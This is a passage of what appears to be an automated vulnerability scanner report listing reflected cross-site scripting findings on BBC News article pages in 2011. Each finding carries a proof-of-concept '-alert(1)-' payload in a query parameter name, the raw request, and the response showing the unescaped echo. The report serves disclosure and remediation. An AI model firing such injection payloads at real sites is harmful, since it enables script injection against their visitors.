Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a903e'-alert(1)-'67ad5e60a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12427905?a903e'-alert(1)-'67ad5e60a6d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=149d05156e3a15d05af95fc331c51508f409f26b201061394b0b83ae6e8b9cee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=149d05156e3a15d05af95fc331c51508f409f26b201061394b0b83ae6e8b9cee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476176000,
       editionToServe: 'us',
       queryString: 'a903e'-alert(1)-'67ad5e60a6d=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427905'
...[SNIP]...

1.15. http://www.bbc.co.uk/news/entertainment-arts-12428196 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f9e8'-alert(1)-'db7a0eecb55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12428196?5f9e8'-alert(1)-'db7a0eecb55=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=754
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=942dc5b5aeda25a19be73cb881544b6db2ff297f40e092b3873deab028a16b7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=942dc5b5aeda25a19be73cb881544b6db2ff297f40e092b3873deab028a16b7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476177000,
       editionToServe: 'us',
       queryString: '5f9e8'-alert(1)-'db7a0eecb55=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428196'
...[SNIP]...

1.16. http://www.bbc.co.uk/news/health-12401970 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57982'-alert(1)-'bf66a815b89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12401970?57982'-alert(1)-'bf66a815b89=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=798
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=148da5a5ee5a25a17a780372d1c88a798cae299d90b061195bdbe26c4d351f6c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=148da5a5ee5a25a17a780372d1c88a798cae299d90b061195bdbe26c4d351f6c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476177000,
       editionToServe: 'us',
       queryString: '57982'-alert(1)-'bf66a815b89=1',
       referrer: null,
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12401970',
       assetType: 'story',
       uri:
...[SNIP]...

1.17. http://www.bbc.co.uk/news/health-12409700 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42623'-alert(1)-'1343e26dedd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12409700?42623'-alert(1)-'1343e26dedd=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=24cd35e51e2a855148fdb629b18cc4c30e820e6180b00203179d3ac05573babe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd35e51e2a855148fdb629b18cc4c30e820e6180b00203179d3ac05573babe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476177000,
       editionToServe: 'us',
       queryString: '42623'-alert(1)-'1343e26dedd=1',
       referrer: null,
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12409700',
       assetType: 'story',
       uri:
...[SNIP]...

1.18. http://www.bbc.co.uk/news/health-12415801 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e518d'-alert(1)-'39e9b4e2cd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12415801?e518d'-alert(1)-'39e9b4e2cd1=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:59 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:59 GMT
Connection: close
Set-Cookie: BBC-UID=b4fde505feaa15f3cad6509b5121491f4ce4689750d0013a247b0ac52fe13c660Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4fde505feaa15f3cad6509b5121491f4ce4689750d0013a247b0ac52fe13c660Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476179000,
       editionToServe: 'us',
       queryString: 'e518d'-alert(1)-'39e9b4e2cd1=1',
       referrer: null,
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12415801',
       assetType: 'story',
       uri:
...[SNIP]...

1.19. http://www.bbc.co.uk/news/magazine-12392811 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9b13'-alert(1)-'d947613eeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12392811?a9b13'-alert(1)-'d947613eeb=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=242db555dedad5751bf949e701c95db53317ed6a7050e1ca443baae4617c629c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=242db555dedad5751bf949e701c95db53317ed6a7050e1ca443baae4617c629c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476181000,
       editionToServe: 'us',
       queryString: 'a9b13'-alert(1)-'d947613eeb=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12392811',
       assetType: 'story',
       
...[SNIP]...

1.20. http://www.bbc.co.uk/news/magazine-12418046 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef37f'-alert(1)-'b107016d690 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12418046?ef37f'-alert(1)-'b107016d690=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:10 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:10 GMT
Connection: close
Set-Cookie: BBC-UID=84bdb5554eda859e4a2d68dde1a7b2e12691189b5010c1e92b4be32ea04e24ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84bdb5554eda859e4a2d68dde1a7b2e12691189b5010c1e92b4be32ea04e24ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476190000,
       editionToServe: 'us',
       queryString: 'ef37f'-alert(1)-'b107016d690=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12418046',
       assetType: 'story',
       
...[SNIP]...

1.21. http://www.bbc.co.uk/news/magazine-12428754 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f4c7'-alert(1)-'a1c3f041513 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12428754?2f4c7'-alert(1)-'a1c3f041513=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=765
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=34cd3575be3ac5355ac1245c910de6c3c9cd7993d0b0c1b91b2b03b2c75de95e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34cd3575be3ac5355ac1245c910de6c3c9cd7993d0b0c1b91b2b03b2c75de95e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476181000,
       editionToServe: 'us',
       queryString: '2f4c7'-alert(1)-'a1c3f041513=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428754',
       assetType: 'story',
       
...[SNIP]...

1.22. http://www.bbc.co.uk/news/magazine-12428759 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 474a9'-alert(1)-'6d1c4d80a64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12428759?474a9'-alert(1)-'6d1c4d80a64=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:05 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:05 GMT
Connection: close
Set-Cookie: BBC-UID=942dc5650e8a05693bc979a9218a73dcb766010350c0f1ea548bea84dcee88fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=942dc5650e8a05693bc979a9218a73dcb766010350c0f1ea548bea84dcee88fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476185000,
       editionToServe: 'us',
       queryString: '474a9'-alert(1)-'6d1c4d80a64=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428759',
       assetType: 'story',
       
...[SNIP]...

1.23. http://www.bbc.co.uk/news/science-environment-12412662 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a35a'-alert(1)-'9d835525957 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12412662?8a35a'-alert(1)-'9d835525957=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:03 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:03 GMT
Connection: close
Set-Cookie: BBC-UID=54ddb545ce1a35279a7fe62871177c3b03c334d710d051aa14cb2a84d63c50540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54ddb545ce1a35279a7fe62871177c3b03c334d710d051aa14cb2a84d63c50540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476183000,
       editionToServe: 'us',
       queryString: '8a35a'-alert(1)-'9d835525957=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1241266
...[SNIP]...

1.24. http://www.bbc.co.uk/news/science-environment-12417858 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c0d'-alert(1)-'1fc2efe71c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12417858?34c0d'-alert(1)-'1fc2efe71c4=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:03 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:03 GMT
Connection: close
Set-Cookie: BBC-UID=545d2575aeaa552716cbef36c179dad3a189880ed060e1ba34eb6a558d80daba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=545d2575aeaa552716cbef36c179dad3a189880ed060e1ba34eb6a558d80daba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476183000,
       editionToServe: 'us',
       queryString: '34c0d'-alert(1)-'1fc2efe71c4=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1241785
...[SNIP]...

1.25. http://www.bbc.co.uk/news/science-environment-12424620 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cae'-alert(1)-'e32dfe7f00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12424620?73cae'-alert(1)-'e32dfe7f00=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:04 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:03:04 GMT
Connection: close
Set-Cookie: BBC-UID=549d25459e0a25c8dabdaa3151b5a2cc9e853a274080f1099bab033f13f5a3320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:04 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=549d25459e0a25c8dabdaa3151b5a2cc9e853a274080f1099bab033f13f5a3320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:04 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476184000,
       editionToServe: 'us',
       queryString: '73cae'-alert(1)-'e32dfe7f00=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1242462
...[SNIP]...

1.26. http://www.bbc.co.uk/news/technology-12419672 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20fd3'-alert(1)-'d9bcef9e45f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12419672?20fd3'-alert(1)-'d9bcef9e45f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:05 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:05 GMT
Connection: close
